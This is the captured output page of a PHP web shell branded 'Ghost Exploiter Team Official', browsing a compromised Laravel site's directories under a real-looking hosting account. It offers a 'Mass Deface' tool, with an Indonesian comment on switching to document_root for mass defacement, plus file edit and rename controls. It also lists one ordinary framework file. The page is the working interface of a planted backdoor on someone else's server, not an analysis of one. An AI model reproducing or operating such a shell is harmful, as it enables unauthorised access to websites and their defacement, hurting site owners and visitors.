webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Bus
/
Events
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
BatchDispatched.php
0.401KB
edt
ren
<?php namespace Illuminate\Bus\Events; use Illuminate\Bus\Batch; class BatchDispatched { /** * The batch instance. * * @var \Illuminate\Bus\Batch */ public $batch; /** * Create a new event instance. * * @param \Illuminate\Bus\Batch $batch * @return void */ public function __construct(Batch $batch) { $this->batch = $batch; } }
<=Back
Liking